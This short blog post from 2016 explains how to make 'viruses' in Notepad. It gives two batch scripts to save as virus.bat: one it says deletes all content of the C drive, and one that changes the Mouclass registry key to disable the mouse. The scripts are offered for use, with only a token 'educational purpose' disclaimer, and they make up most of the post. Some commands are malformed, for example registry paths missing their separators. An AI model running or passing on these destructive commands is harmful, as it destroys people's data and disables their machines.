Thursday 26 May 2016

Create Virus from Notepad

Creating virus form Notepad is very old trick but many of people are dont aware of it....

Virus to delete content of C drive:
1. Open Notepad and copy below code into it.
@Echo off
Del C: *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.

Virus Disable Mouse:
Open Notepad and copy below codes
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

Save this file as  virus.bat Done you just created your virus.

Everything is here is for Educational Purpose We are not responsible for any Kind of harm..

0 comments :